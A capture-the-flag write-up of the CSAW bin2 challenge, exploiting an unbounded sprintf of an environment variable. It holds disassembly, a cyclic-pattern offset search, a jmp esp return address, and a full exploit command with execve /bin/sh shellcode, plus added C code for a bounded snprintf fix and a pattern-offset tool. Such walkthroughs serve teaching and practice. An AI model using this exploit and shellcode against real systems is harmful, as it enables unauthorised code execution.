CSAW CTF Exploitation bin2 Solution



This past weekend, the ISIS lab held CSAW CTF quals. For more information about the event see: csawctf.poly.edu

Here is the description for bin2:

Bin2 - 300 Points ssh csawctf.poly.edu:30002

binary: bin2 Environment: ASLR, Ubuntu 11.04

user21000@ubuntu:~$ uname -a 
Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux
user21000@ubuntu:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
user21000@ubuntu:~$ ls -l
total 12
-r-xr-sr-x 1 user21000 flag 7518 2011-09-22 17:37 bin2
-r--r----- 1 flag      flag   32 2011-09-22 17:37 key
user21000@ubuntu:~$ ./bin2 
:(

We have just gotten a wake-up call from the Nintendo Generation.
user21000@ubuntu:~$ ./bin2 1
:)

Mess with the best, die like the rest.

Once the binary is given an argument, it prints :) instead of :(, a hint that it expects an argument. The disassembly shows what it does with that argument.

..snip..
 8048544:       8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 8048547:       89 44 24 04             mov    DWORD PTR [esp+0x4],eax
 804854b:       c7 04 24 eb 88 04 08    mov    DWORD PTR [esp],0x80488eb
 8048552:       e8 01 ff ff ff          call   8048458 <strcmp@plt>
 8048557:       85 c0                   test   eax,eax
 8048559:       75 40                   jne    804859b <vv+0x67>
 804855b:       8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 804855e:       89 04 24                mov    DWORD PTR [esp],eax
 8048561:       e8 92 fe ff ff          call   80483f8 <getenv@plt>
 8048566:       89 45 f0                mov    DWORD PTR [ebp-0x10],eax
..snip..

It performs a strcmp between the supplied argument and the string at 0x80488eb. If the strings match, it calls getenv() with that same argument, so the user chooses which environment variable is read. I copied the binary locally.

csaw:~$ gdb --args bin2 1
GNU gdb (GDB) 7.1-ubuntu
..snip..
Starting program: /home/csaw/bin2 1

Breakpoint 1, 0x0804862d in main ()
(gdb) x/s 0x80488eb
0x80488eb:	 "MOTR"
(gdb) q
csaw:~$ export MOTR=ok
csaw:~$ ./bin2 MOTR
:)

ok

Following the controlled data from getenv leads to a sprintf into a fixed stack buffer at ebp-0x210 (528 bytes) before any of the MOTR contents are displayed. This is our bug: a vanilla stack overflow.

   0x08048583 <+79>:	mov    DWORD PTR [esp+0x8],edx
   0x08048587 <+83>:	mov    DWORD PTR [esp+0x4],eax
   0x0804858b <+87>:	lea    eax,[ebp-0x210]
   0x08048591 <+93>:	mov    DWORD PTR [esp],eax
   0x08048594 <+96>:	call   0x80483c8 <sprintf@plt>
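
The bug is an unbounded sprintf into a 0x210-byte stack buffer. As an added example (not bin2's source, whose format string is unknown, so the format ":)\n\n%s\n" and the function names are assumed), here is the bounded form a defender would want: snprintf caps the write and its return value exposes truncation so oversized input is rejected rather than silently clipped.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the stack buffer the disassembly shows at [ebp-0x210]. */
#define BUF_SZ 0x210

/* Hardened replacement for the unbounded sprintf: snprintf never writes
 * more than out_sz bytes, and its return value (the length the full
 * output would have had) lets the caller detect truncation and refuse
 * the input instead of printing a silently clipped message.
 * The format string is assumed; it only mimics the output on the page.
 * Returns 0 on success, -1 if the value is NULL or does not fit. */
int format_motd(char *out, size_t out_sz, const char *value)
{
    if (out == NULL || out_sz == 0 || value == NULL)
        return -1;
    int n = snprintf(out, out_sz, ":)\n\n%s\n", value);
    if (n < 0 || (size_t)n >= out_sz)
        return -1;              /* would have overflowed: reject it */
    return 0;
}

/* Exercise format_motd with a constructed value of `len` 'A' bytes, the
 * same shape as the "A"x532 payload used against the real binary. */
int check_value_of_length(size_t len)
{
    char buf[BUF_SZ];
    char *value = malloc(len + 1);
    if (value == NULL)
        return -1;
    memset(value, 'A', len);
    value[len] = '\0';
    int rc = format_motd(buf, sizeof buf, value);
    free(value);
    return rc;
}
```

With the 5 literal bytes of the assumed format, a value of up to 522 bytes fits and anything longer is refused; the original sprintf would have kept writing past the buffer, the saved EBP and the return address.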

The offset needed to overwrite EIP is 532, found with Metasploit's pattern_create.rb and pattern_offset.rb; that is the 0x210-byte buffer plus the saved EBP.

csaw:~$ export MOTR=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
csaw:~$ ./bin2 MOTR
:)

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Segmentation fault (core dumped)
csaw:~$ gdb bin2 core
..snip..
Program terminated with signal 11, Segmentation fault.
#0  0x72413772 in ?? ()
gdb> q
csaw:~$ /opt/metasploit3/msf3//tools/pattern_offset.rb 0x72413772 1000
532
csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x24\x24\x24\x24"."\x90"x1000 ."\xcc\xcc\xcc\xcc"'`
csaw:~$ gdb bin2 core
GNU gdb (GDB) 7.1-ubuntu
..snip..
Core was generated by `./bin2 MOTR'.
Program terminated with signal 11, Segmentation fault.
#0  0x24242424 in ?? ()
gdb> x/x $esp
0xbf920590:	0x90909090
gdb> q
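
The pattern_create.rb / pattern_offset.rb step above, reimplemented as an added C example (my own code, not the page's or Metasploit's; function names are mine): it rebuilds the cyclic pattern and maps the faulting EIP 0x72413772 back to offset 532 by undoing the little-endian load from the stack.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Length at which the cyclic pattern wraps: 26 * 26 * 10 triples. */
#define PATTERN_MAX (26 * 26 * 10 * 3)

/* Build the pattern pattern_create.rb emits (Aa0Aa1Aa2...Zz9) into out,
 * which must hold len+1 bytes. Within PATTERN_MAX bytes every 4-byte
 * window is unique, so a clobbered EIP maps back to one position. */
size_t pattern_create(char *out, size_t len)
{
    size_t i = 0;
    for (char u = 'A'; u <= 'Z' && i < len; u++)
        for (char l = 'a'; l <= 'z' && i < len; l++)
            for (char d = '0'; d <= '9' && i < len; d++) {
                const char triple[3] = { u, l, d };
                for (int k = 0; k < 3 && i < len; k++)
                    out[i++] = triple[k];
            }
    out[i] = '\0';
    return i;
}

/* Equivalent of pattern_offset.rb: the faulting EIP was loaded
 * little-endian from the stack, so emit its bytes low-first and search
 * for them in a pattern of `len` bytes. Returns the offset or -1. */
long pattern_offset(uint32_t eip, size_t len)
{
    char pat[PATTERN_MAX + 1];
    unsigned char needle[4];
    size_t i;

    if (len > PATTERN_MAX)
        len = PATTERN_MAX;
    pattern_create(pat, len);
    for (i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));   /* 0x72413772 -> "r7Ar" */
    for (i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}
```

The 0x24242424 ("$$$$") value used as the test EIP later never occurs in the pattern, so a lookup for it returns -1.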

Next we need an instruction that transfers control to our payload. After the crash ESP points at the NOP sled (the x/x $esp above shows 0x90909090), so a jmp esp inside the binary itself, which is loaded at a fixed address despite ASLR, will do.

csaw:~$ /opt/metasploit3/msf3/msfelfscan -j esp bin2 
[bin2]
0x0804866d jmp esp

NOTE: Normally, a jmp esp (0xe4ff) is rarely found in a gcc-compiled binary. Using ROP and looking for other gadgets is another way to complete this challenge. I explicitly put 0xe4ff in the binary to make the challenge easier for people new to CTF exploitation challenges.

csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x6d\x86\x04\x08"."\x90"x1000 ."\xcc\xcc\xcc\xcc"'`
csaw:~$ ./bin2 MOTR
:)

AAAAAAAAAAAAA
..snip..
�
Trace/breakpoint trap (core dumped)

NX was not enabled on the binary, so the int3 instructions can be replaced with shellcode to get a shell.

csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x6d\x86\x04\x08"."\x90"x1000 ."\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
csaw:~$ ./bin2 MOTR
:)

AA
..snip..
�1���Qh//shh/bin���

$ whoami
csaw

On the game server, the same exploit gives a shell that can read the key: key{Just_to_review_your_skillz}.